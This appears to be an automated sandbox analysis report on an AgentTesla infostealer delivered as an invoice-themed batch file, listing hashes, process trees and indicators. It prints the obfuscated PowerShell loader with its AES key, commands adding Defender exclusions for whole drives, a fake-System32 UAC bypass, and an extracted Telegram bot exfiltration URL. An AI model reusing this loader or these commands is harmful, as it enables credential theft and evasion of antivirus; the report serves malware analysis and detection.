Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
03/06/2024, 06:09
Static task
static1
Behavioral task
behavioral1
Sample
INVOICE07.bat
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
INVOICE07.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
INVOICE07.bat
Resource
win7-20231129-en
Behavioral task
behavioral4
Sample
INVOICE07.bat
Resource
win10v2004-20240426-en
Behavioral task
behavioral5
Sample
InvoiceConfirmation3.bat
Resource
win7-20240508-en
General
-
Target
INVOICE07.bat
-
Size
540KB
-
MD5
1952a79579272db52a814baf57821f90
-
SHA1
3fcfb6c3d2c08e840d758e905c2f304ec39ca9f3
-
SHA256
e575145995f725fbaecc1b95c73ec0fbdad3117e1f492dc8d93ad076f5ad2da1
-
SHA512
088de9db26c4eda94bb71a5379118418c06bcb46d8ccce7d1da2719c8d742e8347a4dfde9f73afbb362ef461a0af159408d9150adc8653f6e5a3507408eb6a93
-
SSDEEP
12288:xToPjPt8r1cxIMTOQo5Xq4PpsXis9Jhqd8FJVqzT+53xH:xeWrOa4UaYpsXlJIdwSIZ
Malware Config
Extracted
agenttesla
https://api.telegram.org/bot7135973864:AAGVqtrGeLysm0FYcz68sQIn3nL2a6CxjMc/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 29 2804 powershell.exe 31 2804 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 1632 powershell.exe 2804 powershell.exe 4320 powershell.exe 1048 powershell.exe 3084 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4192 ComputerDefaults.exe -
Loads dropped DLL 1 IoCs
pid Process 4192 ComputerDefaults.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 api.ipify.org 30 ip-api.com 28 api.ipify.org -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 1632 powershell.exe 1632 powershell.exe 3084 powershell.exe 3084 powershell.exe 2804 powershell.exe 2804 powershell.exe 2804 powershell.exe 1048 powershell.exe 1048 powershell.exe 1048 powershell.exe 2804 powershell.exe 2804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1632 powershell.exe Token: SeDebugPrivilege 3084 powershell.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 1048 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1624 wrote to memory of 3176 1624 cmd.exe 86 PID 1624 wrote to memory of 3176 1624 cmd.exe 86 PID 1624 wrote to memory of 1252 1624 cmd.exe 87 PID 1624 wrote to memory of 1252 1624 cmd.exe 87 PID 1624 wrote to memory of 1632 1624 cmd.exe 88 PID 1624 wrote to memory of 1632 1624 cmd.exe 88 PID 1632 wrote to memory of 3084 1632 powershell.exe 94 PID 1632 wrote to memory of 3084 1632 powershell.exe 94 PID 1632 wrote to memory of 4748 1632 powershell.exe 99 PID 1632 wrote to memory of 4748 1632 powershell.exe 99 PID 4748 wrote to memory of 4192 4748 cmd.exe 101 PID 4748 wrote to memory of 4192 4748 cmd.exe 101 PID 4192 wrote to memory of 4140 4192 ComputerDefaults.exe 102 PID 4192 wrote to memory of 4140 4192 ComputerDefaults.exe 102 PID 4140 wrote to memory of 468 4140 cmd.exe 104 PID 4140 wrote to memory of 468 4140 cmd.exe 104 PID 4140 wrote to memory of 2752 4140 cmd.exe 108 PID 4140 wrote to memory of 2752 4140 cmd.exe 108 PID 4140 wrote to memory of 2804 4140 cmd.exe 109 PID 4140 wrote to memory of 2804 4140 cmd.exe 109 PID 2804 wrote to memory of 1048 2804 powershell.exe 111 PID 2804 wrote to memory of 1048 2804 powershell.exe 111 PID 2804 wrote to memory of 4320 2804 powershell.exe 115 PID 2804 wrote to memory of 4320 2804 powershell.exe 115
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"2⤵PID:3176
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YFEk7bCybDCwVf0wTlX8N4pDcP2M+6VJEGXybuh+8wc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ppkRkLHGStauzXAtFwrtog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWVPe=New-Object System.IO.MemoryStream(,$param_var); $VqYlz=New-Object System.IO.MemoryStream; $hGmEI=New-Object System.IO.Compression.GZipStream($VWVPe, [IO.Compression.CompressionMode]::Decompress); $hGmEI.CopyTo($VqYlz); $hGmEI.Dispose(); $VWVPe.Dispose(); $VqYlz.Dispose(); $VqYlz.ToArray();}function execute_function($param_var,$param2_var){ $NuRNy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Lqnnw=$NuRNy.EntryPoint; $Lqnnw.Invoke($null, $param2_var);}$ITxqM = 'C:\Users\Admin\AppData\Local\Temp\INVOICE07.bat';$host.UI.RawUI.WindowTitle = $ITxqM;$NFyDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ITxqM).Split([Environment]::NewLine);foreach ($RWjHW in $NFyDa) { if ($RWjHW.StartsWith('beDrwtSuNzbegooyjSZN')) { $bpNTb=$RWjHW.Substring(20); break; }}$payloads_var=[string[]]$bpNTb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:1252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3084
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4748 -
C:\Windows \System32\ComputerDefaults.exe"C:\Windows \System32\ComputerDefaults.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c call SC.cmd5⤵
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\system32\cmd.execmd /c "set __=^&rem"6⤵PID:468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YFEk7bCybDCwVf0wTlX8N4pDcP2M+6VJEGXybuh+8wc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ppkRkLHGStauzXAtFwrtog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWVPe=New-Object System.IO.MemoryStream(,$param_var); $VqYlz=New-Object System.IO.MemoryStream; $hGmEI=New-Object System.IO.Compression.GZipStream($VWVPe, [IO.Compression.CompressionMode]::Decompress); $hGmEI.CopyTo($VqYlz); $hGmEI.Dispose(); $VWVPe.Dispose(); $VqYlz.Dispose(); $VqYlz.ToArray();}function execute_function($param_var,$param2_var){ $NuRNy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Lqnnw=$NuRNy.EntryPoint; $Lqnnw.Invoke($null, $param2_var);}$ITxqM = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $ITxqM;$NFyDa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ITxqM).Split([Environment]::NewLine);foreach ($RWjHW in $NFyDa) { if ($RWjHW.StartsWith('beDrwtSuNzbegooyjSZN')) { $bpNTb=$RWjHW.Substring(20); break; }}$payloads_var=[string[]]$bpNTb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:2752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "7⤵
- Command and Scripting Interpreter: PowerShell
PID:4320
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56c47b3f4e68eebd47e9332eebfd2dd4e
SHA167f0b143336d7db7b281ed3de5e877fa87261834
SHA2568c48b1f2338e5b24094821f41121d2221f1cb3200338f46df49f64d1c4bc3e0c
SHA5120acf302a9fc971ef9df65ed42c47ea17828e54dff685f4434f360556fd27cdc26a75069f00dcdc14ba174893c6fd7a2cfd8c6c07be3ce35dafee0a006914eaca
-
Filesize
540KB
MD51952a79579272db52a814baf57821f90
SHA13fcfb6c3d2c08e840d758e905c2f304ec39ca9f3
SHA256e575145995f725fbaecc1b95c73ec0fbdad3117e1f492dc8d93ad076f5ad2da1
SHA512088de9db26c4eda94bb71a5379118418c06bcb46d8ccce7d1da2719c8d742e8347a4dfde9f73afbb362ef461a0af159408d9150adc8653f6e5a3507408eb6a93
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
80KB
MD5d25a9e160e3b74ef2242023726f15416
SHA127a9bb9d7628d442f9b5cf47711c906e3315755b
SHA2567b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c
SHA512bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910
-
Filesize
122KB
MD5e286ada1af4b08fa4b7c78f862883c4e
SHA1798ebc7b7cd3db667f1a59ade299be4cff397f39
SHA25616eb71b68025711fdbc93229fde22ecc73dc8a23be8b40700772b96978187ea3
SHA512fbbbc893388a39e94d8b2265aef75dbaf5fd928fadabd3dbfc5cbee64b600de0102b82e5d2b5c56efe128b45f6ddd4bba2668194c05decdfa78c8e7e382de3f5